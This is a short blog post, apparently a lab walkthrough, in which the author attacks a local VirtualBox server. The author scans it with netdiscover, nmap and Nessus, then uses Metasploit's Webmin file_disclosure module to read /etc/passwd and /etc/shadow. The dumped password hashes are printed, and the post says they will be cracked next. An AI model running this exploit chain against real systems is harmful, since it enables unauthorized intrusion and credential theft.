Senin, 06 Februari 2012

privilage escallation webmin vuln

19.09 blogkublogmu No comments


hacking on weekend, how we can getting the system?? to get it we must follow the rule of hacking.
First step what should I do? Yea,, great information gathering for first step.
root@cupenk:~# netdiscover

Currently scanning: 192.168.48.0/16 | Screen View: Unique Hosts
91 Captured ARP Req/Rep packets, from 10 hosts. Total size: 5460
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.0.40 10:78:d2:36:65:a4 10 600 Unknown vendor
192.168.0.99 60:eb:69:06:22:ec 17 1020 Unknown vendor
192.168.0.137 00:23:8b:f6:c6:b7 11 660 Unknown vendor
192.168.0.21 08:00:27:f9:c1:bb 19 1140 CADMUS COMPUTER SYSTEMS
192.168.0.89 00:1d:72:1a:56:9c 10 600 Wistron Corporation
192.168.0.104 f4:6d:04:81:f9:39 10 600 Unknown vendor
192.168.0.105 00:1d:72:0d:bb:13 11 660 Wistron Corporation
192.168.0.90 70:5a:b6:17:33:40 01 060 Unknown vendor
192.168.0.98 00:26:22:9b:ac:54 01 060 Unknown vendor
192.168.0.138 00:23:5a:ef:0d:a2 01 060 Unknown vendor

virtualbox system has detected to my system, on this virtualbox has installed server.
Next I scanning, any service running in there?
root@cupenk:~# nmap -Pn -v -A -sS 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 17:13 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 17:13
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 17:13, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:13
Completed Parallel DNS resolution of 1 host. at 17:13, 13.00s elapsed
Initiating SYN Stealth Scan at 17:13
Scanning 192.168.0.21 [1000 ports]
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 17:13, 0.13s elapsed (1000 total ports)
Initiating Service scan at 17:13
Scanning 5 services on 192.168.0.21
Completed Service scan at 17:13, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 17:13
Completed NSE at 17:13, 1.02s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.001 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-02-05 00:13:51 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 17:13
Completed NSE at 17:13, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
yea,, some port that open on system. Any vuln in there? I must run nessus for scanning the vuln.
Image
44 vuln 1 high 4 medium 29 low
high vuln on port 22, I try attack to the port
attack to openssh I failed
try to attack again to port
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

exploitation to port 10000 with metasploit:

msf > nmap -T4 -Pn -v -A 192.168.0.21
[*] exec: nmap -T4 -Pn -v -A 192.168.0.21


Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-02-04 18:08 WIT
NSE: Loaded 61 scripts for scanning.
Initiating ARP Ping Scan at 18:08
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 18:08, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:09, 13.00s elapsed
Initiating SYN Stealth Scan at 18:09
Scanning 192.168.0.21 [1000 ports]
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 18:09, 0.09s elapsed (1000 total ports)
Initiating Service scan at 18:09
Scanning 5 services on 192.168.0.21
Completed Service scan at 18:09, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
Retrying OS detection (try #2) against 192.168.0.21
Retrying OS detection (try #3) against 192.168.0.21
Retrying OS detection (try #4) against 192.168.0.21
Retrying OS detection (try #5) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.45s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.51SVN%D=2/4%OT=22%CT=1%CU=36721%PV=Y%DS=1%DC=D%G=Y%M=080027%TM=
OS:4F2D11EF%P=i686-pc-linux-gnu)SEQ(SP=D4%GCD=1%ISR=EF%TI=Z%CI=Z%II=I%TS=7)
OS:OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4
OS:ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
OS:ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%
OS:RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.040 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=212 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Name: MSHOME\Unknown
|_ System time: 2012-02-05 01:09:34 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.00s elapsed
Read data files from: /opt/framework/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.82 seconds
Raw packets sent: 1096 (52.018KB) | Rcvd: 1076 (46.598KB)
msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure


msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST 192.168.0.21 yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed

next I crack the password with john the ripper

Posted in:

0 komentar:

Posting Komentar

Twitter Delicious Facebook Digg Stumbleupon Favorites More
RSS FeedSubscribe to Our RSS feed!
Follow Us on Twitter!Follow Me on Twitter!

 
Design by Free WordPress Themes | Bloggerized by Cup3nK - Premium Blogger Themes | Hosted Desktop